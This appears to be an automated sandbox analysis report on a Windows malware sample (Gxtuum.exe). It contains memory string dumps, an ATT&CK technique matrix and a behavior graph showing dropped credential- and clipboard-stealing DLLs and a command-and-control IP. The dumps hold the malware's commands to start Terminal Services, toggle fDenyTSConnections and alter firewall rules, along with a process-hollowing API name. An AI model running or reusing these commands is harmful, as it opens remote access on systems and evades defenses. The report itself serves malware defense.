SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                              Source: Gxtuum.exeString found in binary or memory: net start termservice
                              Source: Gxtuum.exe, 00000013.00000002.2333216906.00000000007F1000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: net start termservice
                              Source: Gxtuum.exe, 00000013.00000002.2333216906.00000000007F1000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                              Source: Gxtuum.exe, 00000013.00000000.2330753318.00000000007F1000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: net start termservice
                              Source: Gxtuum.exe, 00000013.00000000.2330753318.00000000007F1000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                              Source: Gxtuum.exeString found in binary or memory: net start termservice
                              Source: Gxtuum.exe, 00000014.00000002.3378619283.00000000007F1000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: net start termservice
                              Source: Gxtuum.exe, 00000014.00000002.3378619283.00000000007F1000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                              Source: Gxtuum.exe, 00000014.00000000.2349088893.00000000007F1000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: net start termservice
                              Source: Gxtuum.exe, 00000014.00000000.2349088893.00000000007F1000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              Abuse Elevation Control Mechanism
                              11
                              Disable or Modify Tools
                              2
                              OS Credential Dumping
                              2
                              System Time Discovery
                              1
                              Remote Desktop Protocol
                              1
                              Archive Collected Data
                              12
                              Ingress Tool Transfer
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts13
                              Native API
                              1
                              Scheduled Task/Job
                              1
                              DLL Side-Loading
                              1
                              Deobfuscate/Decode Files or Information
                              1
                              Credential API Hooking
                              1
                              Account Discovery
                              Remote Desktop Protocol4
                              Data from Local System
                              1
                              Encrypted Channel
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Shared Modules
                              1
                              Registry Run Keys / Startup Folder
                              1
                              Access Token Manipulation
                              1
                              Abuse Elevation Control Mechanism
                              1
                              Credentials in Registry
                              3
                              File and Directory Discovery
                              SMB/Windows Admin Shares1
                              Screen Capture
                              1
                              Non-Standard Port
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts1
                              Exploitation for Client Execution
                              Login Hook1012
                              Process Injection
                              2
                              Obfuscated Files or Information
                              1
                              Credentials In Files
                              138
                              System Information Discovery
                              Distributed Component Object Model1
                              Credential API Hooking
                              2
                              Non-Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud Accounts2
                              Command and Scripting Interpreter
                              Network Logon Script1
                              Scheduled Task/Job
                              1
                              Timestomp
                              LSA Secrets681
                              Security Software Discovery
                              SSH3
                              Clipboard Data
                              122
                              Application Layer Protocol
                              Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable Media1
                              Scheduled Task/Job
                              RC Scripts1
                              Registry Run Keys / Startup Folder
                              1
                              DLL Side-Loading
                              Cached Domain Credentials351
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              Rootkit
                              DCSync3
                              Process Discovery
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                              Masquerading
                              Proc Filesystem1
                              Application Window Discovery
                              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt351
                              Virtualization/Sandbox Evasion
                              /etc/passwd and /etc/shadow1
                              System Owner/User Discovery
                              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Access Token Manipulation
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1012
                              Process Injection
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                              Hidden Files and Directories
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Rundll32
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1574171 Sample: yINR7uQlPr.exe Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 171 Multi AV Scanner detection for domain / URL 2->171 173 Suricata IDS alerts for network traffic 2->173 175 Found malware configuration 2->175 177 16 other signatures 2->177 9 yINR7uQlPr.exe 1 3 2->9         started        13 Gxtuum.exe 2->13         started        process3 dnsIp4 109 C:\Users\user\...\1DC30FADAFF92643095942.exe, PE32+ 9->109 dropped 111 1DC30FADAFF9264309...exe:Zone.Identifier, ASCII 9->111 dropped 207 Found evasive API chain (may stop execution after checking mutex) 9->207 209 Found API chain indicative of debugger detection 9->209 211 Contains functionality to inject threads in other processes 9->211 215 8 other signatures 9->215 16 svchost.exe 1 9->16         started        19 audiodg.exe 1 9->19         started        21 msiexec.exe 1 9->21         started        121 185.81.68.148, 49752, 49761, 49773 KLNOPT-ASFI Finland 13->121 113 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 13->113 dropped 115 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 13->115 dropped 117 C:\Users\user\AppData\Local\Temp\...\ssg.exe, PE32 13->117 dropped 119 7 other malicious files 13->119 dropped 213 Contains functionality to start a terminal service 13->213 23 update.exe 13->23         started        25 update.exe 13->25         started        27 rundll32.exe 13->27         started        29 4 other processes 13->29 file5 signatures6 process7 signatures8 125 Found evasive API chain (may stop execution after checking mutex) 16->125 127 Found API chain indicative of debugger detection 16->127 129 Contains functionality to inject threads in other processes 16->129 143 3 other signatures 16->143 31 explorer.exe 81 18 16->31 injected 131 Changes the view of files in windows explorer (hidden files and folders) 19->131 133 Multi AV Scanner detection for dropped file 23->133 145 4 other signatures 23->145 36 msiexec.exe 23->36         started        38 svchost.exe 23->38         started        40 audiodg.exe 23->40         started        135 Machine Learning detection for dropped file 25->135 147 2 other signatures 25->147 42 svchost.exe 25->42         started        44 audiodg.exe 25->44         started        46 msiexec.exe 25->46         started        48 rundll32.exe 27->48         started        137 System process connects to network (likely due to code injection or exploit) 29->137 139 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 